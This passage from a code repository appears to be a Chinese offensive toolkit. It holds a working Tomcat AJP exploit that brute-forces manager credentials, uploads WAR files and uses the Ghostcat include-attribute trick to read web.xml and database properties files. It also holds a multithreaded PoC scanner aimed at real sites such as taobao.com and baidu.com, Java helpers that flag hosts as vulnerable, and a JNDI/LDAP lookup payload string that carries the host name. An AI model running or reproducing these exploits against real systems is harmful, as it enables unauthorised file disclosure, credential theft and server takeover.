= [] 83 | 84 | return fr 85 | 86 | 87 | class Tomcat(object): 88 | def __init__(self, target_host, target_port): 89 | self.target_host = target_host 90 | self.target_port = target_port 91 | 92 | self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 93 | self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) 94 | self.socket.connect((target_host, target_port)) 95 | self.stream = self.socket.makefile("rb", bufsize=0) 96 | 97 | def test_password(self, user, password): 98 | res = False 99 | stop = False 100 | self.forward_request.request_headers['SC_REQ_AUTHORIZATION'] = "Basic " + ("%s:%s" % (user, password)).encode( 101 | 'base64').replace('\n', '') 102 | while not stop: 103 | logger.debug("testing %s:%s" % (user, password)) 104 | responses = self.forward_request.send_and_receive(self.socket, self.stream) 105 | snd_hdrs_res = responses[0] 106 | if snd_hdrs_res.http_status_code == 404: 107 | raise NotFoundException("The req_uri %s does not exist!" % self.req_uri) 108 | elif snd_hdrs_res.http_status_code == 302: 109 | self.req_uri = snd_hdrs_res.response_headers.get('Location', '') 110 | logger.info("Redirecting to %s" % self.req_uri) 111 | self.forward_request.req_uri = self.req_uri 112 | elif snd_hdrs_res.http_status_code == 200: 113 | logger.info("Found valid credz: %s:%s" % (user, password)) 114 | res = True 115 | stop = True 116 | if 'Set-Cookie' in snd_hdrs_res.response_headers: 117 | logger.info("Here is your cookie: %s" % (snd_hdrs_res.response_headers.get('Set-Cookie', ''))) 118 | elif snd_hdrs_res.http_status_code == 403: 119 | logger.info("Found valid credz: %s:%s but the user is not authorized to access this resource" % ( 120 | user, password)) 121 | stop = True 122 | elif snd_hdrs_res.http_status_code == 401: 123 | stop = True 124 | 125 | return res 126 | 127 | def start_bruteforce(self, users, passwords, req_uri, autostop): 128 | logger.info("Attacking a tomcat at ajp13://%s:%d%s" % (self.target_host, self.target_port, req_uri)) 129 | 
self.req_uri = req_uri 130 | self.forward_request = prepare_ajp_forward_request(self.target_host, self.req_uri) 131 | 132 | f_users = open(users, "r") 133 | f_passwords = open(passwords, "r") 134 | 135 | valid_credz = [] 136 | try: 137 | for user in f_users: 138 | f_passwords.seek(0, 0) 139 | for password in f_passwords: 140 | if autostop and len(valid_credz) > 0: 141 | self.socket.close() 142 | return valid_credz 143 | 144 | user = user.rstrip('\n') 145 | password = password.rstrip('\n') 146 | if self.test_password(user, password): 147 | valid_credz.append((user, password)) 148 | except NotFoundException as e: 149 | logger.fatal(e.message) 150 | finally: 151 | logger.debug("Closing socket...") 152 | self.socket.close() 153 | return valid_credz 154 | 155 | def perform_request(self, req_uri, headers={}, method='GET', user=None, password=None, attributes=[]): 156 | self.req_uri = req_uri 157 | self.forward_request = prepare_ajp_forward_request(self.target_host, self.req_uri, 158 | method=AjpForwardRequest.REQUEST_METHODS.get(method)) 159 | logger.debug("Getting resource at ajp13://%s:%d%s" % (self.target_host, self.target_port, req_uri)) 160 | if user is not None and password is not None: 161 | self.forward_request.request_headers['SC_REQ_AUTHORIZATION'] = "Basic " + ( 162 | "%s:%s" % (user, password)).encode('base64').replace('\n', '') 163 | 164 | for h in headers: 165 | self.forward_request.request_headers[h] = headers[h] 166 | 167 | for a in attributes: 168 | self.forward_request.attributes.append(a) 169 | 170 | responses = self.forward_request.send_and_receive(self.socket, self.stream) 171 | print(responses) 172 | if len(responses) == 0: 173 | return None, None 174 | 175 | snd_hdrs_res = responses[0] 176 | 177 | data_res = responses[1:-1] 178 | if len(data_res) == 0: 179 | logger.info("No data in response. 
Headers:\n %s" % pformat(vars(snd_hdrs_res))) 180 | 181 | return snd_hdrs_res, data_res 182 | 183 | def upload(self, filename, user, password, old_version, headers={}): 184 | deploy_csrf_token, obj_cookie = self.get_csrf_token(user, password, old_version, headers) 185 | with open(filename, "rb") as f_input: 186 | with open("/tmp/request", "w+b") as f: 187 | s_form_header = '------WebKitFormBoundaryb2qpuwMoVtQJENti\r\nContent-Disposition: form-data; name="deployWar"; filename="%s"\r\nContent-Type: application/octet-stream\r\n\r\n' % os.path.basename( 188 | filename) 189 | s_form_footer = '\r\n------WebKitFormBoundaryb2qpuwMoVtQJENti--\r\n' 190 | f.write(s_form_header) 191 | f.write(f_input.read()) 192 | f.write(s_form_footer) 193 | 194 | data_len = os.path.getsize("/tmp/request") 195 | 196 | headers = { 197 | "SC_REQ_CONTENT_TYPE": "multipart/form-data; boundary=----WebKitFormBoundaryb2qpuwMoVtQJENti", 198 | "SC_REQ_CONTENT_LENGTH": "%d" % data_len, 199 | "SC_REQ_REFERER": "http://%s/manager/html/" % (self.target_host), 200 | "Origin": "http://%s" % (self.target_host), 201 | } 202 | if obj_cookie is not None: 203 | headers["SC_REQ_COOKIE"] = obj_cookie.group('cookie') 204 | 205 | attributes = [{"name": "req_attribute", "value": ("JK_LB_ACTIVATION", "ACT")}, 206 | {"name": "req_attribute", "value": ("AJP_REMOTE_PORT", "12345")}] 207 | if old_version == False: 208 | attributes.append({"name": "query_string", "value": deploy_csrf_token}) 209 | old_apps = self.list_installed_applications(user, password, old_version) 210 | r = self.perform_request("/manager/html/upload", headers=headers, method="POST", user=user, password=password, 211 | attributes=attributes) 212 | 213 | with open("/tmp/request", "rb") as f: 214 | br = AjpBodyRequest(f, data_len, AjpBodyRequest.SERVER_TO_CONTAINER) 215 | br.send_and_receive(self.socket, self.stream) 216 | 217 | r = AjpResponse.receive(self.stream) 218 | if r.prefix_code == AjpResponse.END_RESPONSE: 219 | logger.error('Upload failed') 
220 | 221 | while r.prefix_code != AjpResponse.END_RESPONSE: 222 | r = AjpResponse.receive(self.stream) 223 | logger.debug('Upload seems normal. Checking...') 224 | new_apps = self.list_installed_applications(user, password, old_version) 225 | if len(new_apps) == len(old_apps) + 1 and new_apps[:-1] == old_apps: 226 | logger.info('Upload success!') 227 | else: 228 | logger.error('Upload failed') 229 | 230 | def get_error_page(self): 231 | return self.perform_request("/blablablablabla") 232 | 233 | def get_version(self): 234 | hdrs, data = self.get_error_page() 235 | for d in data: 236 | s = re.findall('(Apache Tomcat/[0-9\.]+) ', d.data) 237 | if len(s) > 0: 238 | return s[0] 239 | 240 | def get_csrf_token(self, user, password, old_version, headers={}, query=[]): 241 | # first we request the manager page to get the CSRF token 242 | hdrs, rdata = self.perform_request("/manager/html", headers=headers, user=user, password=password) 243 | deploy_csrf_token = re.findall('(org.apache.catalina.filters.CSRF_NONCE=[0-9A-F]*)"', 244 | "".join([d.data for d in rdata])) 245 | if old_version == False: 246 | if len(deploy_csrf_token) == 0: 247 | logger.critical("Failed to get CSRF token. 
Check the credentials") 248 | return 249 | 250 | logger.debug('CSRF token = %s' % deploy_csrf_token[0]) 251 | obj = re.match("(?PJSESSIONID=[0-9A-F]*); Path=/manager(/)?; HttpOnly", 252 | hdrs.response_headers.get('Set-Cookie', '')) 253 | if obj is not None: 254 | return deploy_csrf_token[0], obj 255 | return deploy_csrf_token[0], None 256 | 257 | def list_installed_applications(self, user, password, old_version, headers={}): 258 | deploy_csrf_token, obj_cookie = self.get_csrf_token(user, password, old_version, headers) 259 | headers = { 260 | "SC_REQ_CONTENT_TYPE": "application/x-www-form-urlencoded", 261 | "SC_REQ_CONTENT_LENGTH": "0", 262 | "SC_REQ_REFERER": "http://%s/manager/html/" % (self.target_host), 263 | "Origin": "http://%s" % (self.target_host), 264 | } 265 | if obj_cookie is not None: 266 | headers["SC_REQ_COOKIE"] = obj_cookie.group('cookie') 267 | 268 | attributes = [{"name": "req_attribute", "value": ("JK_LB_ACTIVATION", "ACT")}, 269 | {"name": "req_attribute", 270 | "value": ("AJP_REMOTE_PORT", "{}".format(self.socket.getsockname()[1]))}] 271 | if old_version == False: 272 | attributes.append({ 273 | "name": "query_string", "value": "%s" % deploy_csrf_token}) 274 | hdrs, data = self.perform_request("/manager/html/", headers=headers, method="GET", user=user, password=password, 275 | attributes=attributes) 276 | found = [] 277 | for d in data: 278 | im = re.findall('/manager/html/expire\?path=([^&]*)&', d.data) 279 | for app in im: 280 | found.append(unquote(app)) 281 | return found 282 | 283 | def undeploy(self, path, user, password, old_version, headers={}): 284 | deploy_csrf_token, obj_cookie = self.get_csrf_token(user, password, old_version, headers) 285 | path_app = "path=%s" % path 286 | headers = { 287 | "SC_REQ_CONTENT_TYPE": "application/x-www-form-urlencoded", 288 | "SC_REQ_CONTENT_LENGTH": "0", 289 | "SC_REQ_REFERER": "http://%s/manager/html/" % (self.target_host), 290 | "Origin": "http://%s" % (self.target_host), 291 | } 292 | if 
obj_cookie is not None: 293 | headers["SC_REQ_COOKIE"] = obj_cookie.group('cookie') 294 | 295 | attributes = [{"name": "req_attribute", "value": ("JK_LB_ACTIVATION", "ACT")}, 296 | {"name": "req_attribute", 297 | "value": ("AJP_REMOTE_PORT", "{}".format(self.socket.getsockname()[1]))}] 298 | if old_version == False: 299 | attributes.append({ 300 | "name": "query_string", "value": "%s&%s" % (path_app, deploy_csrf_token)}) 301 | r = self.perform_request("/manager/html/undeploy", headers=headers, method="POST", user=user, password=password, 302 | attributes=attributes) 303 | r = AjpResponse.receive(self.stream) 304 | if r.prefix_code == AjpResponse.END_RESPONSE: 305 | logger.error('Undeploy failed') 306 | 307 | # Check the successful message 308 | found = False 309 | regex = r'Message:<\/strong><\/small> <\/td>\s*
(OK - .*' + path + ')\s*<\/pre><\/td>'
310 |         while r.prefix_code != AjpResponse.END_RESPONSE:
311 |             r = AjpResponse.receive(self.stream)
312 |             if r.prefix_code == 3:
313 |                 f = re.findall(regex, r.data)
314 |                 if len(f) > 0:
315 |                     found = True
316 |         if found:
317 |             logger.info('Undeploy succeed')
318 |         else:
319 |             logger.error('Undeploy failed')
320 | 
321 | 
if __name__ == "__main__":
    # CLI: target host, AJP port (default 8009) and the path placed in
    # javax.servlet.include.path_info (default WEB-INF/web.xml).
    parser = argparse.ArgumentParser()
    parser.add_argument('target', type=str, help="Hostname or IP to attack")
    parser.add_argument('-p', '--port', type=int, default=8009, help="AJP port to attack (default is 8009)")
    parser.add_argument("-f", '--file', type=str, default='WEB-INF/web.xml', help="file path :(WEB-INF/web.xml)")
    args = parser.parse_args()
    client = Tomcat(args.target, args.port)

    # Every request below carries the same three javax.servlet.include.*
    # request attributes; only path_info changes between requests.
    # NOTE(review): an AJP connector that is not reachable from untrusted
    # hosts, or that requires a shared `secret`, should refuse this request.
    # Confirm against the connector configuration of the Tomcat under review.
    first_attrs = [
        {'name': 'req_attribute', 'value': ['javax.servlet.include.request_uri', '/']},
        {'name': 'req_attribute', 'value': ['javax.servlet.include.path_info', args.file]},
        {'name': 'req_attribute', 'value': ['javax.servlet.include.servlet_path', '/']},
    ]
    first_hdrs, first_chunks = client.perform_request(req_uri='/', method='GET', attributes=first_attrs)
    first_body = "".join(d.data for d in first_chunks)
    print(first_body)

    # Keyword hints printed when the returned text mentions further
    # configuration files.
    if "WEB-INF" in first_body or "properties" in first_body:
        print("**********************注意可能有WEB-INF、properties配置文件*************************")

    if "classpath" in first_body:
        print("**********************注意可能有classpath的xml文件*************************")

    words_list = [
        'WEB-INF/classes/application-config.xml',
        'WEB-INF/classes/application-druid.yml',
        'WEB-INF/classes/jdbc.properties',
        'WEB-INF/classes/db.properties',
        'WEB-INF/classes/database.properties',
        'WEB-INF/classes/datasource.properties',
        'WEB-INF/classes/mybatis.properties',
        'WEB-INF/classes/application.properties',
        'WEB-INF/classes/spring-websocket-v2.0.xml',
        'WEB-INF/classes/spring-mvc.xml',
        'WEB-INF/classes/log4j.properties',
    ]

    for word in words_list:
        print(":::::::::" + word + ":::::::::")
        word_attrs = [
            {'name': 'req_attribute', 'value': ['javax.servlet.include.request_uri', '/']},
            {'name': 'req_attribute', 'value': ['javax.servlet.include.path_info', word]},
            {'name': 'req_attribute', 'value': ['javax.servlet.include.servlet_path', '/']},
        ]
        word_hdrs, word_chunks = client.perform_request(req_uri='/', method='GET', attributes=word_attrs)
        page = "".join(d.data for d in word_chunks)
        # A body containing "Error report" is treated as a miss and not printed.
        if "Error report" not in page:
            print(page)
362 | 
363 | 
364 | 


--------------------------------------------------------------------------------
/pythonexp/poc2jarpiliang.py:
--------------------------------------------------------------------------------
 1 | # -*- coding:utf-8 -*-
 2 | # author:f0ngf0ng
 3 | 
 4 | # 入参为:yml文件 url.txt  yml文件里有时间条件、关键词条件
 5 | # command写死在java里,直接python3 xxxx.py xx.yml即可
 6 | # java输出为文件,
 7 | # 如http://x.x.x.x ————————vul
 8 | #   http://x.x.x.x ———————
 9 | 
10 | import requests
11 | import csv,yaml,os
12 | from concurrent.futures import ThreadPoolExecutor
13 | import sys
14 | 
# Proxy map for both schemes, pointing at 127.0.0.1:8080 (presumably a local
# intercepting proxy). None of the requests calls in exp() pass it, so it has
# no effect on the traffic this script sends.
proxies = dict.fromkeys(('http', 'https'), '127.0.0.1:8080')
19 | 
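def exp(url,ymlfile):
    """Send the request described by one YAML template to ``url`` and print the result line.

    The template is read from ``<script dir>/../<ymlfile>``. Its ``method``,
    ``uri``, ``param``, ``data`` and ``others`` (request headers) keys shape the
    request, and ``condition.words`` is the marker searched for in the response
    headers and body. When the request completes, ``url`` is printed, with
    ``…………vul`` appended if the marker was found. Nothing is printed when the
    request raises.

    Args:
        url: base URL including the scheme; ``uri`` and ``?param`` are appended.
        ymlfile: template path, relative to the parent of this script's directory.

    Side effects: assigns the module-level ``words``, performs one HTTP request
    with certificate verification disabled, and writes to stdout.
    """
    global words
    # Directory that holds this script; templates live one level above it.
    curPath = os.path.dirname(os.path.realpath(__file__))
    yamlPath = os.path.join(curPath + '/..' , ymlfile)
    # Read the template and close the handle straight away instead of leaving
    # it open for the lifetime of the worker thread.
    with open(yamlPath, 'r', encoding='utf-8') as f:
        cfg = f.read()

    # The templates are plain mappings of strings and numbers. safe_load
    # restricts parsing to plain YAML types, so a template obtained from a
    # third party cannot make the loader construct anything else.
    d = yaml.safe_load(cfg)

    if "method" in d:
        method = d["method"]  # request method
    if "uri" in d:
        uri = d["uri"]  # request path
    if "param" in d:
        param = d["param"]  # query string appended after the path
    if "data" in d:
        data = d["data"]  # request body, may be empty
    if "others" in d:
        headers = d["others"]  # the "others" mapping is used as the request headers
    if "condition" in d:
        words = d["condition"]['words']  # keyword that marks a positive response

    # YAML parses bare numbers as int, but header values have to be strings.
    for value in headers:
        if type(headers[value]) == int:
            headers[value] = str(headers[value])

    try:
        # verify=False is used on every request, so silence urllib3's warning once.
        requests.packages.urllib3.disable_warnings()
        if method == "GET":
            r = requests.get(url + uri + "?" + param, headers=headers, timeout=5, verify=False )
        elif method == "POST":
            # NOTE(review): this branch calls requests.get, so the body goes out on a GET request.
            r = requests.get(url + uri + "?" + param, data=data ,headers=headers, timeout=5, verify=False )
        elif method == "PUT":
            r = requests.put(url + uri + "?" + param, data=data ,headers=headers, timeout=5, verify=False )

        # Flatten the response headers and body into one string for the keyword search.
        total = ""
        for _ in r.headers:
            total = total + _ + ":" + r.headers[_] +'\n'
        total = total + r.text

        if words != "" and words in total:
            url = url  + '…………vul'
        print(url)

    except Exception:
        # Best effort per target: connection errors, timeouts and templates
        # with missing keys are skipped without output.
        pass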
80 | 
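if __name__ == '__main__':
    # Usage: <script> <yml file>. Targets are read from pythonexp/url.txt,
    # one per CSV row, first column only.
    ymlFile = sys.argv[1]

    # Read the list inside a context manager so the file handle is closed
    # even when a row cannot be parsed.
    with open('pythonexp/url.txt') as data:
        rows = list(csv.reader(data))

    with ThreadPoolExecutor(50) as pool:  # 50 worker threads
        for row in rows:
            # csv.reader yields [] for a blank line; row[0] would raise IndexError.
            if not row or not row[0].strip():
                continue
            target = row[0].strip()
            # Test the scheme prefix rather than a substring: a bare host name
            # that merely contains "http" still needs a scheme added.
            if target.startswith(('http://', 'https://')):
                url = target
            else:
                url = 'http://' + target
            pool.submit(exp, url, ymlFile)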


--------------------------------------------------------------------------------
/pythonexp/url.txt:
--------------------------------------------------------------------------------
1 | https://www.taobao.com
2 | https://www.baidu.com


--------------------------------------------------------------------------------
/src/main/Main.java:
--------------------------------------------------------------------------------
 1 | package main;
 2 | 
 3 | 
 4 | import java.io.BufferedReader;
 5 | import java.io.IOException;
 6 | import java.io.InputStream;
 7 | import java.io.InputStreamReader;
 8 | import java.net.URL;
 9 | import java.nio.charset.Charset;
10 | import java.util.jar.JarEntry;
11 | import java.util.jar.JarFile;
12 | import javafx.application.Application;
13 | import javafx.fxml.FXMLLoader;
14 | import javafx.scene.Parent;
15 | import javafx.scene.Scene;
16 | import javafx.stage.Stage;
17 | import java.util.Properties;
18 | //import sun.misc.IOUtils;
19 | import java.lang.System;
20 | 
21 | 
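public class Main extends Application {

    /** Classpath location of the main window layout. */
    private static final String MAIN_FXML = "/poc2expgui.fxml";

    /**
     * Loads the main window layout from the classpath and shows it.
     *
     * @param primaryStage stage handed in by the JavaFX runtime
     * @throws Exception if the layout is missing from the classpath or cannot be loaded
     */
    @Override
    public void start(Stage primaryStage) throws Exception {
        URL layout = getClass().getResource(MAIN_FXML);
        if (layout == null) {
            // getResource returns null for a missing resource; fail here with the
            // resource name instead of passing null on to FXMLLoader.
            throw new IllegalStateException("Resource not found on classpath: " + MAIN_FXML);
        }
        Parent root = FXMLLoader.load(layout);
        primaryStage.setTitle("poc2jar综合利用工具 v0.55  f0ng");
        primaryStage.setScene(new Scene(root));
        primaryStage.show();
    }

    /**
     * Program entry point; hands control to the JavaFX launcher.
     *
     * @param args command-line arguments, passed through to {@code launch}
     * @throws IOException declared by the original signature; nothing in this method raises it
     */
    public static void main(String[] args) throws IOException {
        launch(args);
    }
}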


--------------------------------------------------------------------------------
/src/main/ProxyController.java:
--------------------------------------------------------------------------------
 1 | package main;
 2 | 
 3 | import java.io.IOException;
 4 | import java.net.URL;
 5 | import java.util.ResourceBundle;
 6 | 
 7 | import javafx.event.ActionEvent;
 8 | import javafx.fxml.FXML;
 9 | import javafx.fxml.FXMLLoader;
10 | import javafx.fxml.Initializable;
11 | import javafx.scene.Parent;
12 | import javafx.scene.Scene;
13 | import javafx.scene.control.Button;
14 | import javafx.scene.control.TextField;
15 | import javafx.stage.Stage;
16 | import main.util.StageManager;
17 | 
18 | 
public class ProxyController {

    /** Text field for the HTTP/HTTPS proxy address (shown to the user as ip:port). */
    @FXML
    public TextField mTextField66;

    /** Text field for the SOCKS proxy address (shown to the user as ip:port). */
    @FXML
    private TextField mTextField62;

    /**
     * Passes the proxy address typed into this window to the main window's status label.
     *
     * <p>The HTTP/HTTPS field takes precedence when both fields are filled in. The text is
     * displayed exactly as typed; this method does not check that it is a well-formed
     * host and port.
     *
     * @param event the action event that triggered the handler (not used)
     */
    public void openThrid(ActionEvent event) {
        Poc2ExpguiController mainWindow =
                (Poc2ExpguiController) StageManager.CONTROLLER.get("Poc2ExpguiController");

        String httpProxy = mTextField66.getText().trim();
        String socksProxy = mTextField62.getText().trim();

        final String status;
        if (!httpProxy.isEmpty()) {
            status = "现在是http/https代理,ip:port为:" + httpProxy;
        } else if (!socksProxy.isEmpty()) {
            status = "现在是socks代理,ip:port为:" + socksProxy;
        } else {
            // Both fields are empty here, so the appended value adds nothing.
            status = "代理地址为空" + socksProxy;
        }
        mainWindow.mLabeltest.setText(status);
    }
}
65 |  
66 |  


--------------------------------------------------------------------------------
/src/main/RequestPoc/Poclist.java:
--------------------------------------------------------------------------------
  1 | package main.RequestPoc;
  2 | 
  3 | import java.io.File;
  4 | import java.io.FileNotFoundException;
  5 | import java.util.*;
  6 | import java.util.concurrent.Callable;
  7 | import java.util.concurrent.ExecutorService;
  8 | import java.util.concurrent.Executors;
  9 | import java.util.concurrent.Future;
 10 | import java.util.concurrent.locks.Lock;
 11 | import java.util.concurrent.locks.ReentrantLock;
 12 | import javafx.collections.FXCollections;
 13 | import javafx.collections.ObservableList;
 14 | import static main.RequestPoc.Readfile.exptoexp;
 15 | import static main.RequestPoc.Readfile.ymlFiletoexp;
 16 | import static main.RequestPoc.makeRequest.listMakeRequest;
 17 | import static main.RequestPoc.makeRequest.inputurl;
 18 | 
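public class Poclist {

    // Three helpers:
    //   dirnametlistview1 - names of the PoC folders, e.g. poc/tongda, poc/fanwei
    //   dirnametlistview2 - names of the PoC files inside the selected folder
    //   poctoexp          - sends the request described by the selected PoC

    public static void main(String[] args) throws FileNotFoundException {
        // Intentionally empty.
    }

    /**
     * Lists the sub-directories of {@code dirname} (the PoC folders).
     *
     * @param dirname directory to scan
     * @return the sub-directory names; empty when {@code dirname} cannot be listed
     * @throws FileNotFoundException declared by the original signature; not raised here
     */
    public static ObservableList<String> dirnametlistview1(String dirname) throws FileNotFoundException {
        ObservableList<String> names = FXCollections.observableArrayList();
        // listFiles() returns null when the path is missing, is not a directory, or
        // cannot be read; exists() alone does not rule out the last two.
        File[] children = new File(dirname).listFiles();
        if (children == null) {
            System.out.println("文件不存在!");
            return names;
        }
        for (File child : children) {
            if (child.isDirectory()) {
                // getName() is separator-independent; splitting the path on "/" is not.
                names.add(child.getName());
            }
        }
        return names;
    }

    /**
     * Lists the regular files of {@code dirname} (the PoC files of one folder),
     * leaving out macOS {@code .DS_Store} entries.
     *
     * @param dirname directory to scan
     * @return the file names; empty when {@code dirname} cannot be listed
     * @throws FileNotFoundException declared by the original signature; not raised here
     */
    public static ObservableList<String> dirnametlistview2(String dirname) throws FileNotFoundException {
        ObservableList<String> names = FXCollections.observableArrayList();
        File[] children = new File(dirname).listFiles();
        if (children == null) {
            System.out.println("文件不存在!");
            return names;
        }
        for (File child : children) {
            if (!child.isDirectory() && !child.getAbsolutePath().contains(".DS_Store")) {
                System.out.println("文件:" + child.getAbsolutePath());
                names.add(child.getName());
            }
        }
        return names;
    }

    /**
     * Sends the request described by one PoC file to one target and returns the
     * parsed response.
     *
     * @param pocname path of the PoC yml file
     * @param url     target URL substituted into the request
     * @param ishttps scheme selector handed to {@code listMakeRequest}
     * @return a two-element array: [0] the response time text, [1] the response
     *         headers and body; either may be {@code null} when nothing was parsed
     * @throws FileNotFoundException propagated from reading the PoC file
     */
    public static String[] poctoexp(String pocname, String url, String ishttps) throws FileNotFoundException {
        String responsetime = null;
        String responseheaderbody = null;

        // Read the yml file into the exp list.
        String[] explist = ymlFiletoexp(pocname);
        System.out.println("explist");

        // Turn the exp list into request lines, then substitute the target URL.
        String[][] requestHeader = exptoexp(explist);
        String[][] requestHeader2 = inputurl(requestHeader, url);

        // Debug output: echoes the full outgoing request, including any header
        // values taken from the PoC file, to stdout.
        System.out.println("requestHeader2");
        for (String[] row : requestHeader2) {
            for (String cell : row) {
                if (cell != null) {
                    System.out.println(cell);
                }
            }
        }

        // Send the request. The map key is the stringified response header block,
        // the value is "<label>:<time>ms\n<body>" as parsed below.
        Map<String, String> responseHeaderbody = listMakeRequest(requestHeader2, ishttps);
        for (Map.Entry<String, String> entry : responseHeaderbody.entrySet()) {
            String headerText = entry.getKey().replace("null:", "").replace("[", "").replace("]", "");
            try {
                String[] response = entry.getValue().split("ms\n");
                responsetime = response[0].split(":")[1].split("ms")[0];
                responseheaderbody = headerText + '\n' + response[1];
            } catch (ArrayIndexOutOfBoundsException e) {
                // Empty response body: keep the headers only.
                responseheaderbody = headerText + '\n';
            }
        }

        String[] poctoexplist = new String[2];
        poctoexplist[0] = responsetime;
        poctoexplist[1] = responseheaderbody;
        System.out.println("responsetime" + responsetime);
        System.out.println("responseheaderbody" + responseheaderbody);

        return poctoexplist;
    }
}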
135 | 
136 | 


--------------------------------------------------------------------------------
/src/main/RequestPoc/test.java:
--------------------------------------------------------------------------------
 1 | package main.RequestPoc;
 2 | 
 3 | import java.util.*;
 4 | import static main.RequestPoc.makeRequest.listMakeRequest;
 5 | import sun.net.www.MessageHeader;
 6 | 
public class test extends MessageHeader {

    // Declared on this subclass; nothing in this file reads or writes them.
    public int nkeys;
    public String[] keys;
    public String[] values;

    /**
     * Forwards to the superclass unless the header name is {@code Content-type},
     * {@code Connection} or {@code Accept}; for those three the call is dropped.
     * The comparison is case-sensitive.
     *
     * @param arg0 header name
     * @param arg1 header value
     */
    @Override
    public synchronized void setIfNotSet(String arg0, String arg1) {
        boolean suppressed = "Content-type".equals(arg0)
                || "Connection".equals(arg0)
                || "Accept".equals(arg0);
        if (!suppressed) {
            super.setIfNotSet(arg0, arg1);
        }
    }

    /**
     * Scratch check: splits a {@code key: value} line on ':' and re-joins everything
     * after the key, so a value that itself contains ':' is kept whole.
     */
    public static void main(String[] args) {
        String str = "param: DontCheckLogin=1&filePath=c:/windows/system32/drivers/etc/hosts";
        String[] parts = str.split(":");

        StringBuilder joined = new StringBuilder();
        for (int i = 1; i < parts.length; i++) {
            joined.append(':').append(parts[i].trim());
        }

        // Drop the leading ':' added before the first value part.
        System.out.println(joined.substring(1));
    }

    /** Empty placeholder with the same name as the statically imported helper. */
    public static void listMakeRequest(String[][] request_header, String ishttps) {
    }
}
50 | 
51 | 
52 | 


--------------------------------------------------------------------------------
/src/main/RequestPoc/test3.java:
--------------------------------------------------------------------------------
 1 | package main.RequestPoc;
 2 | 
 3 | import java.net.URLDecoder;
 4 | import java.net.URLEncoder;
 5 | import java.util.HashMap;
 6 | import java.util.Map;
 7 | import java.util.regex.Matcher;
 8 | import java.util.regex.Pattern;
 9 | 
public class test3 {

    /**
     * Scratch check for lenient URL-decoding of a string that contains a malformed
     * percent escape.
     *
     * <p>The sample is a percent-encoded JNDI lookup expression that ends in a stray
     * {@code %ht}. {@code URLDecoder.decode} rejects a '%' that is not followed by two
     * hex digits, so such characters are rewritten to {@code %25} first; the rest of the
     * string then decodes normally. The same normalisation step is what a log or
     * request filter needs before it can match encoded input against a signature.
     */
    public static void main(String[] args) {
        String a = "%24%7Bjndi:ldap://%24%7BhostName%7DXXXX%24%7B::-.%ht";

        // Escape every '%' that does not start a valid two-digit hex escape.
        String escaped = a.replaceAll("%(?![0-9a-fA-F]{2})", "%25");

        String decode_text;
        try {
            decode_text = URLDecoder.decode(escaped, "utf-8");
        } catch (Exception e) {
            e.printStackTrace();
            decode_text = "";
        }

        System.out.println(decode_text);
    }
}
25 | 


--------------------------------------------------------------------------------
/src/main/RequestPoc/test4.java:
--------------------------------------------------------------------------------
 1 | package main.RequestPoc;
 2 | 
 3 | import java.io.FileNotFoundException;
 4 | import java.util.Map;
 5 | import static main.RequestPoc.Readfile.exptoexp;
 6 | import static main.RequestPoc.Readfile.ymlFiletoexp;
 7 | import static main.RequestPoc.makeRequest.inputurl;
 8 | import static main.RequestPoc.makeRequest.listMakeRequest;
 9 | 
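public class test4 {
    public static void main(String[] args) {
        // Intentionally empty.
    }

    /**
     * Sends the request described by one PoC file to every URL in {@code urllist} and
     * marks the URLs whose response meets the match condition.
     *
     * <p>A URL is marked when the response contains {@code conditionwords} (ignored when
     * empty), or when the response time lies between {@code conditiontime} and 1.5 times
     * that value. A URL whose response could not be parsed is returned unmarked.
     *
     * @param pocname        path of the PoC yml file
     * @param urllist        target URLs
     * @param conditiontime  response-time condition, in the unit reported by {@code listMakeRequest}
     * @param conditionwords keyword condition; empty disables it
     * @return one entry per URL in input order, the marker text appended on a match; the
     *         array has at least 10000 slots and unused slots stay {@code null}
     * @throws FileNotFoundException propagated from reading the PoC file
     */
    public static String[] poctoexp(String pocname ,String[] urllist,int conditiontime,String conditionwords) throws FileNotFoundException {
        // The original allocated a fixed 10000 slots and overflowed on longer lists;
        // keep that minimum length for existing callers and grow when needed.
        String[] poctoexplist = new String[Math.max(10000, urllist.length)];
        int i = 0;

        // Read the yml file into the exp list, then into request lines.
        String[] explist = ymlFiletoexp(pocname);
        String[][] requestHeader = exptoexp(explist);

        for (String url : urllist) {
            // Per-target state. Declared inside the loop so that a target with no
            // parsable response cannot inherit the previous target's time or body.
            String responsetime = null;
            String responseheaderbody = null;

            // Substitute the target URL and send the request.
            String[][] requestHeader2 = inputurl(requestHeader, url);
            Map<String, String> responseHeaderbody = listMakeRequest(requestHeader2);
            for (Map.Entry<String, String> entry : responseHeaderbody.entrySet()) {
                String headerText = entry.getKey().replace("null:", "").replace("[", "").replace("]", "");
                try {
                    String[] response = entry.getValue().split("\n");
                    responsetime = response[0].split(":")[1].split("ms")[0];
                    responseheaderbody = headerText + '\n' + response[1];
                } catch (ArrayIndexOutOfBoundsException e) {
                    // Empty response body: keep the headers only.
                    responseheaderbody = headerText + '\n';
                }
            }

            boolean wordHit = conditionwords != null
                    && !conditionwords.isEmpty()
                    && responseheaderbody != null
                    && responseheaderbody.contains(conditionwords);

            boolean timeHit = false;
            if (responsetime != null) {
                try {
                    int a = Integer.parseInt(responsetime);
                    // a != 0 mirrors the guard in test6test: with conditiontime == 0 an
                    // unparsed or zero time would otherwise count as a match.
                    timeHit = a != 0 && a >= conditiontime && a <= 1.5 * conditiontime;
                } catch (NumberFormatException e) {
                    timeHit = false;
                }
            }

            if (wordHit || timeHit) {
                poctoexplist[i] = url + "``````````````````````````存在漏洞";
            } else {
                poctoexplist[i] = url;
            }
            i++;
        }

        return poctoexplist;
    }
}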
58 | 


--------------------------------------------------------------------------------
/src/main/RequestPoc/test6test.java:
--------------------------------------------------------------------------------
  1 | package main.RequestPoc;
  2 | 
  3 | import java.util.ArrayList;
  4 | import java.util.List;
  5 | import java.util.Map;
  6 | import java.util.concurrent.ExecutorService;
  7 | import java.util.concurrent.Executors;
  8 | import java.util.concurrent.locks.Lock;
  9 | import java.util.concurrent.locks.ReentrantLock;
 10 | import static main.RequestPoc.Readfile.exptoexp;
 11 | import static main.RequestPoc.Readfile.ymlFiletoexp;
 12 | import static main.RequestPoc.makeRequest.inputurl;
 13 | import static main.RequestPoc.makeRequest.listMakeRequest;
 14 | 
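public class test6test {
    // Shared result list. Every write happens while Url.lock is held; read it through
    // Url.snapshot() while workers may still be running.
    private static List<String> vullist = new ArrayList<>();

    public test6test() {
    }

    /**
     * Starts one thread per URL, each running the PoC against that URL, and waits for
     * all of them to finish.
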